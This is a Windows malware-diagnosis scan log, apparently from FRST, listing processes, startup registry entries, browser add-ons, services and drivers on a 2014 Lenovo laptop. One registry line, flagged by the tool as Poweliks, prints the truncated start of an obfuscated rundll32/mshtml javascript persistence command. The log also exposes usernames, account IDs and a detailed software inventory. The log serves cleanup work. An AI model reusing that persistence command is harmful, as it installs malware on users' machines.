(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Ricoh co.,Ltd.) C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\APSDaemon.exe
(Dolby Laboratories Inc.) C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Professional 7\PdfPro7Hook.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\PccNtMon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(dotSyntax, LLC) C:\Program Files (x86)\Digsby\lib\digsby-app.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google) C:\Users\hstagner\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
() C:\Program Files (x86)\Digsby\lib\aspell\bin\aspell.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\PccNt.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(UltraVNC) C:\Windows\Temp\winvnc.exe
(UltraVNC) C:\Windows\Temp\winvnc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Alexander Roshal) C:\Program Files\WinRAR\WinRAR.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2832168 2011-09-30] (Synaptics Incorporated)
HKLM\...\Run: [TpShocks] => C:\Windows\SYSTEM32\TpShocks.exe [380776 2011-03-29] (Lenovo.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [41320 2011-04-04] (Lenovo Group Limited)
HKLM\...\Run: [ALCKRESI.EXE] => C:\Program Files\Lenovo\AutoLock\ALCKRESI.EXE [281448 2011-02-28] (Lenovo Group Limited)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2010-12-14] (Conexant systems, Inc.)
HKLM-x32\...\Run: [RotateImage] => C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe [55808 2008-10-30] (Ricoh co.,Ltd.)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2010-11-16] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [112152 2011-01-16] (Intel Corporation)
HKLM-x32\...\Run: [PWMTRV] => rundll32 C:\PROGRA~2\ThinkPad\UTILIT~1\PWMTR64V.DLL,PwrMgrBkGndMonitor
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [Nuance PDF Converter Professional 7-reminder] => C:\Program Files (x86)\Nuance\PDF Professional 7\Ereg\Ereg.exe [333672 2011-09-06] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe [506712 2011-02-03] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [PDF7 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Professional 7\RegistryController.exe [141160 2011-09-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFProHook] => C:\Program Files (x86)\Nuance\PDF Professional 7\pdfpro7hook.exe [1787752 2011-11-03] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-01-20] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [OfficeScanNT Monitor] => C:\Program Files (x86)\Trend Micro\Client Server Security Agent\pccntmon.exe [2853424 2014-03-18] (Trend Micro Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-01-20] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-04] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [Google Update] => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-09-18] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [GoogleChromeAutoLaunch_794684615F8C6D6025E9826895DA1B35] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-21] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [Box Edit] => C:\Users\hstagner\AppData\Local\Box\Box Edit\Box Edit.exe [481816 2014-07-24] (Box)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\MountPoints2: {a4607ac7-eec1-11e0-ad47-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-2926875163-4226794389-2330185411-1140\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-04] (Google Inc.)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1140\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-2926875163-4226794389-2330185411-1140\...\MountPoints2: {a4607ac7-eec1-11e0-ad47-806e6f6e6963} - Q:\LenovoQDrive.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CrashPlan Tray.lnk
ShortcutTarget: CrashPlan Tray.lnk -> C:\Program Files\CrashPlan\CrashPlanTray.exe (Code 42 Software, Inc.)
Startup: C:\Users\jmccullough\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Digsby.lnk
ShortcutTarget: Digsby.lnk -> C:\Program Files (x86)\Digsby\digsby.exe ()
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/ig?brand=LENP&bmod=LENP
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll (Symantec Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg32.dll (Trend Micro Inc.)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\PlusIEContextMenu.dll (Zeon Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll (Symantec Corporation)
BHO-x32: ZeonIEEventHelper Class -> {DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll (Zeon Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: TBSB07898 Class -> {FCBCCB87-9224-4B8D-B117-F56D924BEB18} -> C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - DocuCom PDF - {E3286BF1-E654-42FF-B4A6-5E111731DF6B} - C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll (Zeon Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Coupons.com CouponBar - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
Toolbar: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-2926875163-4226794389-2330185411-1140 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {55963676-2F5E-4BAF-AC28-CF26AA587566} https://thinkasg.thinkasg.com/CACHE/stc/1/binaries/vpnweb.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg32.dll (Trend Micro Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\hstagner\AppData\Roaming\Mozilla\Firefox\Profiles\wzygs4sr.default-1398197978032
FF DefaultSearchEngine: Bing 
FF SearchEngineOrder.3: Bing 
FF SelectedSearchEngine: Bing 
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_12_0_0_77.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: ZEON/PDF,version=2.0 -> C:\Program Files (x86)\Nuance\PDF Professional 7\bin\nppdf.dll (Zeon Corporation)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @citrixonline.com/appdetectorplugin -> C:\Users\hstagner\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @talk.google.com/GoogleTalkPlugin -> C:\Users\hstagner\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @talk.google.com/O1DPlugin -> C:\Users\hstagner\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @tools.google.com/Google Update;version=3 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: @tools.google.com/Google Update;version=9 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-2926875163-4226794389-2330185411-1131: box.com/BoxEdit -> C:\Users\hstagner\AppData\Local\Box\Box Edit\npBoxEdit.dll (Box)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\hstagner\AppData\Roaming\mozilla\plugins\npatgpc.dll (Cisco WebEx LLC)
FF Plugin ProgramFiles/Appdata: C:\Users\hstagner\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\hstagner\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Users\hstagner\AppData\Roaming\Mozilla\Firefox\Profiles\wzygs4sr.default-1398197978032\searchplugins\bingp.xml
FF HKLM-x32\...\Firefox\Extensions: [VIP@verisign.com] - C:\Program Files (x86)\Symantec\VIP Access Client
FF Extension: Symantec VIP Access Add-On - C:\Program Files (x86)\Symantec\VIP Access Client [2011-10-04]
FF HKLM-x32\...\Firefox\Extensions: [{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}] - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi
FF Extension: Coupons.com CouponBar - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi [2014-03-12]
FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension
FF Extension: Trend Micro NSC Firefox Extension - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension [2014-08-18]
 
Chrome: 
=======
CHR Profile: C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-08]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
CHR Extension: (Coupons.com Toolbar) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpkmcjgpcihgfnkcjapiaabbbplkcmf [2014-05-15]
CHR Extension: (Cisco WebEx Extension) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma [2014-10-22]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-06]
CHR Extension: (Google Wallet) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-09]
CHR HKLM-x32\...\Chrome\Extension: [cnpkmcjgpcihgfnkcjapiaabbbplkcmf] - C:\Program Files (x86)\Coupons.com CouponBar\chrome\Coupons.com.crx [2013-07-15]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [177648 2014-03-28] (Coupons.com Inc.)
R2 CrashPlanService; C:\Program Files\CrashPlan\CrashPlanService.exe [222720 2013-08-15] (CrashPlan) [File not signed]
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [477032 2011-03-23] (Lenovo.)
R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [93032 2010-04-07] (Lenovo Group Limited)
R2 MerakiPCCAgent; C:\Program Files (x86)\Meraki\PCC Agent 1.0.87\m_agent_service.exe [3103317 2013-11-19] () [File not signed]
R3 MerakiVNCService; C:\Windows\TEMP\winvnc.exe [2048248 2013-09-21] (UltraVNC)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 ntrtscan; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\ntrtscan.exe [1793424 2014-06-23] (Trend Micro Inc.)
R2 PDFProFiltSrv; C:\Program Files (x86)\Nuance\PDF Professional 7\PDFProFiltSrv.exe [135016 2011-09-09] (Nuance Communications, Inc.)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2011-09-01] (Lenovo Group Limited)
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-26] (Lenovo Group Limited) [File not signed]
R2 svcGenericHost; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe [51760 2014-03-31] (Trend Micro Inc.)
R2 svctcom; C:\Windows\SysWOW64\svctcom.exe [283264 2014-08-05] (Birch Grove Software, Inc.)
R3 TMBMServer; C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe [571928 2013-10-23] () [File not signed]
R2 tmlisten; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmlisten.exe [1998080 2014-07-23] (Trend Micro Inc.)
R3 TmProxy; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmProxy.exe [927768 2013-10-14] (Trend Micro Inc.)
R2 TSM Client Scheduler; C:\Program Files\Tivoli\TSM\baclient\dsmcsvc.exe [24791064 2010-04-27] (IBM Corporation)
R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed]
R2 VIPAppService; C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [84088 2011-04-13] (Symantec Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2011-10-04] ()
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R3 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [85376 2013-08-29] () [File not signed]
R1 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [175528 2013-09-02] () [File not signed]
R3 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [65336 2013-08-29] () [File not signed]
R2 TmFilter; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmXPFlt.sys [344864 2013-08-14] (Trend Micro Inc.)
R2 TmPreFilter; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmPreFlt.sys [42272 2013-08-14] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [109080 2013-01-09] (Trend Micro Inc.)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-09-24] (Lenovo (United States) Inc.)
R2 VSApiNt; C:\Program Files (x86)\Trend Micro\Client Server Security Agent\VSApiNt.sys [2260768 2013-08-14] (Trend Micro Inc.)
U3 tmpfw; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-14 12:50 - 2014-11-14 12:50 - 00000000 ____D () C:\FRST
2014-11-14 12:49 - 2014-11-14 12:50 - 00000000 ____D () C:\Users\hstagner\Downloads\Malware fix (2)
2014-11-14 12:47 - 2014-11-14 12:47 - 00000000 ____D () C:\Users\hstagner\AppData\Roaming\WinRAR
2014-11-14 12:46 - 2014-11-14 12:46 - 00000000 ____D () C:\Users\hstagner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-11-14 12:46 - 2014-11-14 12:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-11-14 12:46 - 2014-11-14 12:46 - 00000000 ____D () C:\Program Files\WinRAR
2014-11-14 12:45 - 2014-11-14 12:45 - 01943248 _____ () C:\Users\hstagner\Downloads\winrar-x64-52b3.exe
2014-11-14 12:44 - 2014-11-14 12:44 - 01956057 _____ () C:\Users\hstagner\Downloads\Malware fix (2).rar
2014-11-14 12:42 - 2014-11-14 12:42 - 01956057 _____ () C:\Users\hstagner\Downloads\Malware fix (1).rar
2014-11-14 12:41 - 2014-11-14 12:41 - 01956057 _____ () C:\Users\hstagner\Downloads\Malware fix.rar
2014-11-14 11:31 - 2014-11-14 11:31 - 00195206 _____ () C:\Users\hstagner\AppData\Local\ars.cache
2014-11-14 11:31 - 2014-11-14 11:31 - 00153703 _____ () C:\Users\hstagner\AppData\Local\census.cache
2014-11-14 11:24 - 2014-11-14 11:24 - 00000010 _____ () C:\Users\hstagner\AppData\Local\sponge.last.runtime.cache
2014-11-14 11:17 - 2014-11-14 11:31 - 00000036 _____ () C:\Users\hstagner\AppData\Local\housecall.guid.cache
2014-11-14 11:17 - 2014-11-14 11:17 - 02476596 _____ (Trend Micro Inc.) C:\Users\hstagner\Downloads\HousecallLauncher64 (1).exe
